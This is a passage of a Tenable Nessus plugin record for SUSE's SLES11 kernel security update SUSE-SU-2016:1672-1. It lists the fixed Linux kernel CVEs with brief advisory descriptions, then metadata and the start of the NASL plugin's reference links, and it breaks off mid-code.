CVE-2016-4805: Use-after-free vulnerability in drivers/net/ppp/ppp_generic.c in the Linux kernel allowed local users to cause a denial of service (memory corruption and system crash, or spinlock) or possibly have unspecified other impact by removing a network namespace, related to the ppp_register_net_channel and ppp_unregister_channel functions (bnc#980371).\n\n - CVE-2016-0758: Tags with indefinite length could have corrupted pointers in asn1_find_indefinite_length (bsc#979867).\n\n - CVE-2016-2187: The gtco_probe function in drivers/input/tablet/gtco.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971944).\n\n - CVE-2016-4482: The proc_connectinfo function in drivers/usb/core/devio.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory via a crafted USBDEVFS_CONNECTINFO ioctl call (bnc#978401).\n\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in the Linux kernel allowed attackers to cause a denial of service (panic) via an ASN.1 BER file that lacks a public key, leading to mishandling by the public_key_verify_signature function in crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel incorrectly relies on the write system call, which allowed local users to cause a denial of service (kernel memory write operation) or possibly have unspecified other impact via a uAPI interface (bnc#979548).\n\n - CVE-2016-4485: The llc_cmsg_rcv function in net/llc/af_llc.c in the Linux kernel did not initialize a certain data structure, which allowed attackers to obtain sensitive information from kernel stack memory by reading a message (bnc#978821).\n\n - CVE-2016-4578: sound/core/timer.c in the Linux kernel did not initialize certain r1 data structures, which allowed local users to obtain sensitive information from kernel stack memory via crafted use of the ALSA timer interface, related to the (1) snd_timer_user_ccallback and (2) snd_timer_user_tinterrupt functions (bnc#979879).\n\n - CVE-2016-4569: The snd_timer_user_params function in sound/core/timer.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory via crafted use of the ALSA timer interface (bnc#979213).\n\n - CVE-2016-4486: The rtnl_fill_link_ifmap function in net/core/rtnetlink.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory by reading a Netlink message (bnc#978822).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not validate certain offset fields, which allowed local users to gain privileges or cause a denial of service (heap memory corruption) via an IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-2847: fs/pipe.c in the Linux kernel did not limit the amount of unread data in pipes, which allowed local users to cause a denial of service (memory consumption) by creating many pipes with non-default sizes (bnc#970948).\n\n - CVE-2016-2188: The iowarrior_probe function in drivers/usb/misc/iowarrior.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970956).\n\n - CVE-2016-3138: The acm_probe function in drivers/usb/class/cdc-acm.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a USB device without both a control and a data endpoint descriptor (bnc#970911).\n\n - CVE-2016-3137: drivers/usb/serial/cypress_m8.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a USB device without both an interrupt-in and an interrupt-out endpoint descriptor, related to the cypress_generic_port_probe and cypress_open functions (bnc#970970).\n\n - CVE-2016-3140: The digi_port_init function in drivers/usb/serial/digi_acceleport.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970892).\n\n - CVE-2016-2186: The powermate_probe function in drivers/input/misc/powermate.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970958).\n\n - CVE-2016-2185: The ati_remote2_probe function in drivers/input/misc/ati_remote2.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971124).\n\n - CVE-2016-3156: The IPv4 implementation in the Linux kernel mishandles destruction of device objects, which allowed guest OS users to cause a denial of service (host OS networking outage) by arranging for a large number of IP addresses (bnc#971360).\n\n - CVE-2016-2184: The create_fixed_stream_quirk function in sound/usb/quirks.c in the snd-usb-audio driver in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference or double free, and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971125).\n\n - CVE-2016-3139: The wacom_probe function in drivers/input/tablet/wacom_sys.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970909).\n\n - CVE-2016-2143: The fork implementation in the Linux kernel on s390 platforms mishandles the case of four page-table levels, which allowed local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted application, related to arch/s390/include/asm/mmu_context.h and arch/s390/include/asm/pgalloc.h (bnc#970504).\n\n - CVE-2016-2782: The treo_attach function in drivers/usb/serial/visor.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a (1) bulk-in or (2) interrupt-in endpoint (bnc#968670).\n\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in the Linux kernel did not properly maintain a hub-interface data structure, which allowed physically proximate attackers to cause a denial of service (invalid memory access and system crash) or possibly have unspecified other impact by unplugging a USB hub device (bnc#968010).\n\n - CVE-2015-7566: The clie_5_attach function in drivers/usb/serial/visor.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacked a bulk-out endpoint (bnc#961512).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-08-29T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : kernel (SUSE-SU-2016:1672-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7566", "CVE-2015-8816", "CVE-2016-0758", "CVE-2016-1583", "CVE-2016-2053", "CVE-2016-2143", "CVE-2016-2184", "CVE-2016-2185", "CVE-2016-2186", "CVE-2016-2187", "CVE-2016-2188", "CVE-2016-2782", "CVE-2016-2847", "CVE-2016-3134", "CVE-2016-3137", "CVE-2016-3138", "CVE-2016-3139", "CVE-2016-3140", "CVE-2016-3156", "CVE-2016-4482", "CVE-2016-4485", "CVE-2016-4486", "CVE-2016-4565", "CVE-2016-4569", "CVE-2016-4578", "CVE-2016-4580", "CVE-2016-4805", "CVE-2016-4913", "CVE-2016-5244"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-ec2", "p-cpe:/a:novell:suse_linux:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:kernel-ec2-devel", "p-cpe:/a:novell:suse_linux:kernel-pae", "p-cpe:/a:novell:suse_linux:kernel-pae-base", "p-cpe:/a:novell:suse_linux:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:kernel-source", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-trace", "p-cpe:/a:novell:suse_linux:kernel-trace-base", "p-cpe:/a:novell:suse_linux:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-1672-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93164", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1672-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93164);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-7566\", \"CVE-2015-8816\", \"CVE-2016-0758\", \"CVE-2016-1583\", \"CVE-2016-2053\", \"CVE-2016-2143\", \"CVE-2016-2184\", \"CVE-2016-2185\", \"CVE-2016-2186\", \"CVE-2016-2187\", \"CVE-2016-2188\", \"CVE-2016-2782\", \"CVE-2016-2847\", \"CVE-2016-3134\", \"CVE-2016-3137\", \"CVE-2016-3138\", \"CVE-2016-3139\", \"CVE-2016-3140\", \"CVE-2016-3156\", \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-4486\", \"CVE-2016-4565\", \"CVE-2016-4569\", \"CVE-2016-4578\", \"CVE-2016-4580\", \"CVE-2016-4805\", \"CVE-2016-4913\", \"CVE-2016-5244\");\n\n script_name(english:\"SUSE SLES11 Security Update : kernel (SUSE-SU-2016:1672-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various\nsecurity and bugfixes.\n\nNotable changes in this kernel :\n\n - It is now possible to mount a NFS export on the\n exporting host directly.\n\nThe following security bugs were fixed :\n\n - CVE-2016-5244: A kernel information leak in\n rds_inc_info_copy was fixed that could leak kernel stack\n memory to userspace (bsc#983213).\n\n - CVE-2016-1583: Prevent the usage of mmap when the lower\n file system does not allow it. This could have lead to\n local privilege escalation when ecryptfs-utils was\n installed and /sbin/mount.ecryptfs_private was setuid\n (bsc#983143).\n\n - CVE-2016-4913: The get_rock_ridge_filename function in\n fs/isofs/rock.c in the Linux kernel mishandles NM (aka\n alternate name) entries containing \\0 characters, which\n allowed local users to obtain sensitive information from\n kernel memory or possibly have unspecified other impact\n via a crafted isofs filesystem (bnc#980725).\n\n - CVE-2016-4580: The x25_negotiate_facilities function in\n net/x25/x25_facilities.c in the Linux kernel did not\n properly initialize a certain data structure, which\n allowed attackers to obtain sensitive information from\n kernel stack memory via an X.25 Call Request\n (bnc#981267).\n\n - CVE-2016-4805: Use-after-free vulnerability in\n drivers/net/ppp/ppp_generic.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash, or spinlock) or possibly\n have unspecified other impact by removing a network\n namespace, related to the ppp_register_net_channel and\n ppp_unregister_channel functions (bnc#980371).\n\n - CVE-2016-0758: Tags with indefinite length could have\n corrupted pointers in asn1_find_indefinite_length\n (bsc#979867).\n\n - CVE-2016-2187: The gtco_probe function in\n drivers/input/tablet/gtco.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a crafted endpoints value in a USB device descriptor\n (bnc#971944).\n\n - CVE-2016-4482: The proc_connectinfo function in\n drivers/usb/core/devio.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory via a crafted USBDEVFS_CONNECTINFO ioctl call\n (bnc#978401).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relies on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bnc#979548).\n\n - CVE-2016-4485: The llc_cmsg_rcv function in\n net/llc/af_llc.c in the Linux kernel did not initialize\n a certain data structure, which allowed attackers to\n obtain sensitive information from kernel stack memory by\n reading a message (bnc#978821).\n\n - CVE-2016-4578: sound/core/timer.c in the Linux kernel\n did not initialize certain r1 data structures, which\n allowed local users to obtain sensitive information from\n kernel stack memory via crafted use of the ALSA timer\n interface, related to the (1) snd_timer_user_ccallback\n and (2) snd_timer_user_tinterrupt functions\n (bnc#979879).\n\n - CVE-2016-4569: The snd_timer_user_params function in\n sound/core/timer.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory via crafted use of the ALSA timer interface\n (bnc#979213).\n\n - CVE-2016-4486: The rtnl_fill_link_ifmap function in\n net/core/rtnetlink.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory by reading a Netlink message (bnc#978822).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-2847: fs/pipe.c in the Linux kernel did not\n limit the amount of unread data in pipes, which allowed\n local users to cause a denial of service (memory\n consumption) by creating many pipes with non-default\n sizes (bnc#970948).\n\n - CVE-2016-2188: The iowarrior_probe function in\n drivers/usb/misc/iowarrior.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a crafted endpoints value in a USB device descriptor\n (bnc#970956).\n\n - CVE-2016-3138: The acm_probe function in\n drivers/usb/class/cdc-acm.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a USB device without both a control and a data endpoint\n descriptor (bnc#970911).\n\n - CVE-2016-3137: drivers/usb/serial/cypress_m8.c in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a USB device without both an\n interrupt-in and an interrupt-out endpoint descriptor,\n related to the cypress_generic_port_probe and\n cypress_open functions (bnc#970970).\n\n - CVE-2016-3140: The digi_port_init function in\n drivers/usb/serial/digi_acceleport.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970892).\n\n - CVE-2016-2186: The powermate_probe function in\n drivers/input/misc/powermate.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970958).\n\n - CVE-2016-2185: The ati_remote2_probe function in\n drivers/input/misc/ati_remote2.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#971124).\n\n - CVE-2016-3156: The IPv4 implementation in the Linux\n kernel mishandles destruction of device objects, which\n allowed guest OS users to cause a denial of service\n (host OS networking outage) by arranging for a large\n number of IP addresses (bnc#971360).\n\n - CVE-2016-2184: The create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (NULL pointer dereference or\n double free, and system crash) via a crafted endpoints\n value in a USB device descriptor (bnc#971125).\n\n - CVE-2016-3139: The wacom_probe function in\n drivers/input/tablet/wacom_sys.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970909).\n\n - CVE-2016-2143: The fork implementation in the Linux\n kernel on s390 platforms mishandles the case of four\n page-table levels, which allowed local users to cause a\n denial of service (system crash) or possibly have\n unspecified other impact via a crafted application,\n related to arch/s390/include/asm/mmu_context.h and\n arch/s390/include/asm/pgalloc.h (bnc#970504).\n\n - CVE-2016-2782: The treo_attach function in\n drivers/usb/serial/visor.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact by inserting a\n USB device that lacks a (1) bulk-in or (2) interrupt-in\n endpoint (bnc#968670).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bnc#968010).\n\n - CVE-2015-7566: The clie_5_attach function in\n drivers/usb/serial/visor.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact by inserting a\n USB device that lacked a bulk-out endpoint (bnc#961512).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=676471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=866130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=898592\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=944309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=946122\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=949752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=953369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956491\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956852\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=957986\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=957988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=957990\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959381\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=960458\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=960857\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963998\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965860\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965923\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968018\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968566\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969149\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970114\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970504\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970911\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970958\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971433\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971446\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971947\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971989\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=972363\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973237\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974787\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=975358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=975772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=975945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=976739\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=976868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979274\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979347\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979548\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980371\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980788\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980931\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981267\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982532\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982691\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984107\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7566/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0758/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1583/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2053/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2143/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2185/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2186/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2187/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2188/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2782/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2847/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3137/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3138/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3139/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3140/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3156/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4482/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4485/\"\n );\n 